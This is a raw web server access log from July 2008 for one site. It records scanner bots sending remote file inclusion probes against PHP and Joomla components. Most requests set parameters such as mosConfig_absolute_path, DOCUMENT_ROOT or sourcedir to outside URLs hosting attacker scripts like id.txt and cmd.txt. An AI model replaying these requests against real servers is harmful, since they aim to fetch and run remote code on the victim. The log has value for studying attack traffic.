72.9.145.107 - - [29/Jul/2008:11:09:38 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:09:39 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:09:39 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.189.130 - - [29/Jul/2008:11:09:42 -0700] "GET /admin.php?DOCUMENT_ROOT=http://www.lovasok.hu/admin/templates_c/s.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.93.189.130 - - [29/Jul/2008:11:09:43 -0700] "GET /logs/admin.php?DOCUMENT_ROOT=http://www.lovasok.hu/admin/templates_c/s.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.93.189.130 - - [29/Jul/2008:11:09:45 -0700] "GET /admin.php?DOCUMENT_ROOT=http://www.lametaradio.com/scripts/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.93.189.130 - - [29/Jul/2008:11:09:53 -0700] "GET /logs/admin.php?DOCUMENT_ROOT=http://www.lametaradio.com/scripts/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:11:09:56 -0700] "GET /logs/access_080329.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:11:09:56 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:11:09:56 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:10:02 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:10:09 -0700] "GET /logs/access.log//index.php?include=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:10:10 -0700] "GET /logs//index.php?include=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:11:10:11 -0700] "GET //index.php?include=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18449 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:10:12 -0700] "GET /?sourcedir=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 18425 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:10:18 -0700] "GET /logs/?sourcedir=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 58281 "-" "libwww-perl/5.808" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:10:20 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:11:10:28 -0700] "GET /logs/?sourcedir=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 200 58265 "-" "libwww-perl/5.48" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:11:10:30 -0700] "GET /?sourcedir=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 200 18421 "-" "libwww-perl/5.48" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:10:33 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.34.238 - - [29/Jul/2008:11:11:02 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
190.156.74.25 - - [29/Jul/2008:11:11:09 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.239.0.245 - - [29/Jul/2008:11:11:35 -0700] "GET /logs/access_080329.log///index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:11:38 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:11:38 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:11:40 -0700] "GET //index.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:11:41 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:11:41 -0700] "GET //index.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:11:41 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.239.0.245 - - [29/Jul/2008:11:11:45 -0700] "GET /logs///index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.239.0.245 - - [29/Jul/2008:11:11:47 -0700] "GET ///index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 18523 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:11:12:03 -0700] "GET /logs/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:12:06 -0700] "GET //index.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.69" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:11:12:09 -0700] "GET /?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 200 18407 "-" "libwww-perl/5.65" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:11:12:23 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:13:56 -0700] "GET /logs/access_080329.log//claroline/tracking/userLog.php?rootSys=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:11:13:56 -0700] "GET /logs/access_080329.log//claroline/tracking/userLog.php?rootSys=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.47.15 - - [29/Jul/2008:11:14:08 -0700] "GET /logs/access_080322.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.47.15 - - [29/Jul/2008:11:14:08 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.47.15 - - [29/Jul/2008:11:14:08 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:14:13 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:11:14:31 -0700] "GET /phphtml.php?htmlclass_path=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.10.47.15 - - [29/Jul/2008:11:14:31 -0700] "GET /logs/access_080228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.239.0.245 - - [29/Jul/2008:11:14:32 -0700] "GET /logs/access_080306.log///index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:11:14:59 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.65.34.76 - - [29/Jul/2008:11:15:08 -0700] "GET //jinzora/extras/mt.php?root_dir=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
62.65.34.76 - - [29/Jul/2008:11:15:09 -0700] "GET /logs//jinzora/extras/mt.php?root_dir=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:15:25 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:15:26 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:11:15:35 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:11:15:41 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:16:02 -0700] "GET /logs/access_080322.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:16:03 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:16:03 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:16:10 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:11:16:11 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 200 18605 "-" "libwww-perl/5.65" "www.dmulk.com"
141.85.101.1 - - [29/Jul/2008:11:16:28 -0700] "GET /logs/access_080228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:16:35 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:11:16:49 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
203.72.181.15 - - [29/Jul/2008:11:16:58 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 200 18417 "-" "libwww-perl/5.65" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:11:17:18 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:17:19 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:17:19 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:17:19 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.34.238 - - [29/Jul/2008:11:17:32 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:11:17:33 -0700] "GET /logs/access_080315.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:11:17:51 -0700] "GET /logs/?sourcedir=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:11:17:51 -0700] "GET /logs/access_080313.log/?sourcedir=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
192.192.35.235 - - [29/Jul/2008:11:17:52 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:11:17:52 -0700] "GET /?sourcedir=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 200 18425 "-" "libwww-perl/5.806" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:18:02 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:18:43 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:19:07 -0700] "GET /logs/access.log//join.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:19:07 -0700] "GET //join.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:11:19:33 -0700] "GET /logs/access_071224.log/main.php?pg=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:19:45 -0700] "GET /logs/access_080313.log/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:19:47 -0700] "GET /?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 200 18381 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:19:48 -0700] "GET /logs/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.811" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:11:19:51 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:19:52 -0700] "GET /logs/access_080313.log/?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:11:19:53 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:19:53 -0700] "GET /?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 200 18359 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:19:54 -0700] "GET /logs/?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 200 58281 "-" "libwww-perl/5.811" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:11:19:55 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:19:55 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:19:55 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:19:55 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:19:55 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:20:02 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18353 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:20:03 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:20:03 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:20:03 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:20:07 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:20:11 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:20:13 -0700] "GET /logs/access.log/index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:20:15 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 200 18417 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:20:15 -0700] "GET /logs/index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:20:21 -0700] "GET //index.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 200 18393 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:20:23 -0700] "GET //index.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.810" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:20:25 -0700] "GET /logs/access.log/index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:20:27 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 200 18423 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:20:27 -0700] "GET /logs/index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:11:20:31 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:20:33 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:20:34 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:20:34 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:20:40 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:20:40 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:20:41 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.133.102.211 - - [29/Jul/2008:11:20:49 -0700] "GET /logs/access_080218.log/?sourcedir=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:21:15 -0700] "GET /logs/access.log//join.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:21:15 -0700] "GET //join.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:21:16 -0700] "GET /logs//join.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.72.181.15 - - [29/Jul/2008:11:21:32 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [29/Jul/2008:11:21:32 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:21:34 -0700] "GET /logs/access_080313.log/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:21:35 -0700] "GET /?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 200 18381 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:11:21:36 -0700] "GET /logs/?sourcedir=http://artyficio.com/new/id.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.811" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:21:39 -0700] "GET /logs/access.log/admin.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:21:40 -0700] "GET /admin.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:21:40 -0700] "GET /logs/admin.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:21:52 -0700] "GET /logs/access.log/index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:21:52 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 200 18423 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:11:22:09 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://dpfbrasil.net63.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [29/Jul/2008:11:22:15 -0700] "GET //join.php?DOCUMENT_ROOT=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
